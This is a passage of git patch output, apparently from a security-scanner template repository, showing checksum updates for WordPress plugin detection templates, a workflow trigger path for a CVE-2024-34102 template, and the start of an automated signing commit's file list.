+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:376c9aa05d92c97ede13dff8deefc4740c6552dd -http/technologies/wordpress/plugins/pixelyoursite.yaml:5d504e55711fbd697085cb01647a774b0cdccb52 -http/technologies/wordpress/plugins/polylang.yaml:5afda641556d8b3dd81f281defc3c2cac19e125b +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:9662a5e6e47302dcb4e262e1d9715ee7d4353f6e -http/technologies/wordpress/plugins/post-smtp.yaml:25e8846b36dab7ef76b02d6c104ea095fdc0ba00 -http/technologies/wordpress/plugins/post-types-order.yaml:fe1e8fb67b8a99e3b795414cc37c0e594ff61347 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:d4708f37e3803aee4671a8cb8d059d69ee097bfd -http/technologies/wordpress/plugins/pretty-link.yaml:6497dd59cbb4714ccc629816d1a3780a6b393ad6 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:94c42b58ec263d4723e306d6f586056904df35a4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:21a5ed9d172bd5db188c4da3fab292eeac73f15c -http/technologies/wordpress/plugins/redirection.yaml:0640138fbbabf7514c57a3d6d89473fb844fa421 -http/technologies/wordpress/plugins/redux-framework.yaml:21ef278dc5f1ad4772cd78a3b21aa9ca6f32faf2 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:68e736683f7f84e7649daad21f1e0926cf6187f0 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:19af5e6e20b0f83f0cba5996b15dc635750e6d17 -http/technologies/wordpress/plugins/safe-svg.yaml:c5a9e49022102ac9c0ce53d0114c77449a0fa60f -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:9497e5e54a3c869a79e0ad3e4855f3a8a985e99c -http/technologies/wordpress/plugins/sg-cachepress.yaml:a77c890f5c3965bd1036f92c6aef984320ed9511 -http/technologies/wordpress/plugins/sg-security.yaml:4cb9ccdf4200c0725e7da3c398f46a3b614f9c2d -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:61cfbfaf250c6562eaf8f024d5c2ac3fef06209d -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:676e481dd0758b3fc5cbd372565c3986fa372cab -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:5d96d805b90d9f3ad511b2bb1da1bb67f1b96395 -http/technologies/wordpress/plugins/simple-history.yaml:6783f5974e0e3d7c72a2c92d16c0380e2c084127 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:cadc40173d91553afe56da8dd531e14207bf56a4 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bb39aa024e6fbe4c5544ff6157e8304867028d62 -http/technologies/wordpress/plugins/smart-slider-3.yaml:28c3cb266926103b96b31300ebb3bd66a26f1db1 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:cda7128e214f970e199c68290e1f55317e13f6ec +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:1a8d08f06f80873a48beb03980404952ca87c1a0 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:1ebfcc51a5164ecdbbda1c03286071597b29118d -http/technologies/wordpress/plugins/sucuri-scanner.yaml:995792d584c301af284e60595f8ab44b5c9463b0 -http/technologies/wordpress/plugins/svg-support.yaml:6c155e41feca0722f81305bd41054d9dc08e39e0 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:fe3aa9b29b541584c2ac501c83e7a6039d4e0ef3 -http/technologies/wordpress/plugins/tablepress.yaml:a0c9b1739e6c414dc6d1e2008b7b7cd716d19205 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:d8c3b358790511cf59aec90c8aea87bcb81ed0b7 -http/technologies/wordpress/plugins/templately.yaml:77d8bdd7bc067f480f22ad4b1b9edfef9daf8c5b -http/technologies/wordpress/plugins/the-events-calendar.yaml:ba4ebc80dc49b024e30fd3f847226e9212df84a7 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:a00d98d4753ebff7d2a743a3f947858145bc177a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2639874bad35863fa4ab74d4c3fbed8d20c164ac -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:a8e6f47fd22388839982a30983f071b1ad7da335 -http/technologies/wordpress/plugins/under-construction-page.yaml:a097718957903abece841f6f3cf245221f5ac48b +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:8421856fdac391acebb5c236e6a19315bbf325dc +http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:0fcaaa60667e5c557673bd31773a48c895b170a5 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:836c8a668cf2b9eb2060512f51a8927344795505 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:704e6fbdea9578a2fe2e0857b9b5d414cbeb65f4 -http/technologies/wordpress/plugins/webp-express.yaml:c004d2fff24068bd6e3da387f25b608b5a79fe84 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:00f3a20157b726f9a7cd0386461f723fbe60143e -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:3c13a8977dd4a84900094fe6a443c78c74b01da1 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:5a0fc451e1699cfb65bc85033b90ae0f61fe1936 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:da73ee3338bbc53e655c3f441840754df01c0eeb +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c5fcb29e8ed9f9360168bba088fd3f9bf6124256 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:3b3d3b25be50b2df358afcdd0ac9d6dee3d13f68 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:c3e222558c3572d4e4daefc97ab659c11346807b -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:68fcfda722561a77ae308e74a5afdbbb5446e69b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:b0c2083b4cecfeef40222c10e1d1fde0343f0445 -http/technologies/wordpress/plugins/woocommerce-services.yaml:1252df7b482d29fef54818250b019377dc699442 -http/technologies/wordpress/plugins/woocommerce.yaml:4184e0743e7e333e92d69bd2dc74eee47229f2ca -http/technologies/wordpress/plugins/wordfence.yaml:2e0ab3f89302920e51842ecdab55c7e2d1732833 -http/technologies/wordpress/plugins/wordpress-importer.yaml:334e6fac1fd4cea0b3c6baf0d7f39aab3c5ef889 -http/technologies/wordpress/plugins/wordpress-seo.yaml:eddeac384f67953070146bbebedd4f699e08b713 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:b5fa79307c8d04d58522fc9a96e3a6c859156684 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:acc6ad36cbbc2b4b73262d194b36bbc36a5cfb25 -http/technologies/wordpress/plugins/wp-file-manager.yaml:4256bb7c7d7f912e9614d264503bd4d53b8b0c36 -http/technologies/wordpress/plugins/wp-google-maps.yaml:2000e400033008321c15b552f87b839e93108962 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:5ebd86a854f222c267715770cf3adb2824b4c136 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:c71e3735e88e94e947ba12f8623412fab4782fbd -http/technologies/wordpress/plugins/wp-migrate-db.yaml:6254820f5a169a63f819778eb97a0fbeac611823 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:eb4ae639b1b49bb923567ecd2f08a25c08594169 -http/technologies/wordpress/plugins/wp-optimize.yaml:4f1782ce46a5acf1c80f48f08ff1f74c5961aea3 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:45ac4fb6ba583dd40a69ed3241a7601e4648fd79 -http/technologies/wordpress/plugins/wp-reset.yaml:d5a5ca8b093f0a301c66b25490a0bc2297005b5b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e2980a856fc377d139dbee6b95095e59ed452220 -http/technologies/wordpress/plugins/wp-rollback.yaml:3ac9db1b369ceaf050dff0599262de48ecd74c12 -http/technologies/wordpress/plugins/wp-seopress.yaml:66a587af47063c5f68bc0cef434e414c9738e0f7 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4359b4307e07970185e3b9ac9bbbd76527dd508d -http/technologies/wordpress/plugins/wp-smushit.yaml:bea31939d18e7b718c885dfdea12686f77ee1e0a -http/technologies/wordpress/plugins/wp-statistics.yaml:4703bbb3dd1f0d0b4a0c9083eb9aee27826a4773 -http/technologies/wordpress/plugins/wp-super-cache.yaml:803ff1862075ab80c48447fd53c01aff49811964 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:6fdf18bb03afbe4abddf15206f7bdd71929c49be -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:d9dd08f78abf1f52a41f9eda87b81b228b420417 -http/technologies/wordpress/plugins/wpforms-lite.yaml:ffbf1018981848a334ece6c70ea13272d33706e6 -http/technologies/wordpress/plugins/wps-hide-login.yaml:538f364df60afe1543df76023dc49f91238a0a86 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:391eb456f2c43017f26e4b1befdc47fdf07b0f9f +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:a54cd471a2bc07b0fb83b6db2d0c24a7b23b3c31 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8789,7 +8790,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ffbf74645acabd6996bff678b5acde787de1b0c1 +templates-checksum.txt:2b7157e08f1912a9b7d31ff697a717216cfc379d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c2f1c10b28689f08ea8745afca7ba92ac7af242 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 26 Jun 2024 09:01:51 +0000 Subject: [PATCH 0639/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37f01c16d6..b600aa7dd5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2024/CVE-2024-34102.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From b3c550197d790da801d4597bad745a91491274ad Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 26 Jun 2024 09:02:55 +0000 Subject: [PATCH 0640/1841] Auto Template Signing [Wed Jun 26 09:02:55 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34102.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + 